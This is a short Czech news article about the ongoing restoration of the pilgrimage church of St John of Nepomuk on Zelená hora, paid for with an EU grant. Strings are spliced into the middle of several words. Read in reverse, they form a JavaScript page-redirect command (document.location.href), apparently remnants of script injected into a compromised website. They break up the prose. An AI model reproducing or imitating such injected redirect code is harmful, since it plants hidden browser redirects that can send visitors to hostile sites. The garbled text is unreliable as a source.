Rainbow page separator

Obnova poutního kostela bude pokračovat i v příštím roce

Sobota, 28. prosince 2019

Žďár nad Sázavou / Zásadní stavební opravy poutního kostela svatého Jana Nepomuckého na Zelené hoře, památky UNESCO, které začaly v roce 2017, budou pokračovat i v příštím roce. Kostel například získal nová velká okna, která vypadají jako v době, kdy sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánek podle návrhu stavitele Jana Blažeje Santiniho-Aichla vznikl. Stavební a také restaurá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torské práce probíhaly taktéž v interiéru památky, došlo například na štuky a omítky, přičemž v příštím roce bude nejviditelnějším počinem výměna podlahy nebo zrestaurování hlavního oltáře.
Na opravy se tamní římskoka[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolické farnosti podařilo získat 42,7 milionu korun prostřednictvím evropské dotace. Konečným výsledkem bude komplexní obnova původního stavebně-technického stavu i architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické podoby objektu. Následně má být rovněž otevřena další návštěvnická trasa a nová expozice. Na zvážení je také možnost zpřístupnění druhého patra poutního kostela, v důsledku čehož by návštěvníci dostali možnost pokochat se výhledem do okolí novými okny.